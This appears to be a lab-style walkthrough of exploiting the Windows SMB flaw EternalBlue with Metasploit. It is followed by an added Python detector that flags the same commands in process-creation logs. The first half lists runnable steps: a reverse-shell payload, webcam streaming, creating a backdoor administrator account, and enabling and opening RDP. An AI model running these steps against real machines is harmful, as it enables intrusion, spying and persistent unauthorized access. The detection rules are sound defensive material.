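First, EternalBlue is an exploitation tool for a specific vulnerability in the SMB (Server Message Block) protocol on port 445 of Windows systems. By using the tool to attack an SMB service that has this vulnerability, one can obtain a shell on that system.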
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.31.51
run
use exploit/windows/smb/ms17_010_eternalblue
set LHOST 192.168.31.95
set LPORT 4444
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.31.51
run
webcam_list
webcam_stream
shell
calc
net user /add Tom tom123123
net localgroup administrators Tom /add
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
sc config TermService start= auto
net start Termservice
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
rdesktop 192.168.31.51:3389
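
From the defender's side, the account, registry, service and firewall commands above leave a recognisable trail in process-creation logs (Sysmon Event ID 1 or Security 4688 command lines). The following Python is an added example, not part of the original post: it matches those command lines and flags a host where both a privileged-account change and an RDP-exposure change appear. The host names, rule names and sample records are constructed for illustration.

```python
import re

# Constructed (host, command line) records shaped like process-creation
# log fields. WS01 replays the commands from this page; WS02 is benign.
SAMPLE_EVENTS = [
    ("WS01", r"net user /add Tom tom123123"),
    ("WS01", r"net localgroup administrators Tom /add"),
    ("WS01", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
             r'/v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f'),
    ("WS01", r"sc config TermService start= auto"),
    ("WS01", r'netsh.exe firewall add portopening TCP 3389 "Remote Desktop"'),
    ("WS02", r"net user"),
    ("WS02", r"sc query TermService"),
]

# Rule names are hypothetical labels chosen for this example.
RULES = {
    "local_account_created": re.compile(
        r"\bnet1?(\.exe)?\s+user\b(?=.*\s/add\b)", re.I),
    "added_to_administrators": re.compile(
        r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b(?=.*\s/add\b)", re.I),
    "rdp_enabled_in_registry": re.compile(
        r"\breg(\.exe)?\s+add\b.*Terminal Server.*fDenyTSConnections"
        r".*/d\s+(0x)?0+\b", re.I),
    "termservice_autostart": re.compile(
        r"\bsc(\.exe)?\s+config\s+TermService\b.*start=\s*auto", re.I),
    "firewall_3389_opened": re.compile(
        r"\bnetsh(\.exe)?\s+.*\b(portopening|rule)\b.*\b3389\b", re.I),
}
ACCOUNT = {"local_account_created", "added_to_administrators"}
RDP = {"rdp_enabled_in_registry", "termservice_autostart", "firewall_3389_opened"}

def match_rules(events):
    """Return {host: set of rule names whose pattern matched a command line}."""
    hits = {}
    for host, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.setdefault(host, set()).add(name)
    return hits

def suspicious_hosts(events):
    """Hosts showing both an account change and an RDP-exposure change."""
    return sorted(h for h, names in match_rules(events).items()
                  if names & ACCOUNT and names & RDP)

if __name__ == "__main__":
    for host, names in match_rules(SAMPLE_EVENTS).items():
        print(host, sorted(names))
    print("escalate:", suspicious_hosts(SAMPLE_EVENTS))
```

Each rule alone is common administrative activity; the combination on one host within a short window is what merits escalation.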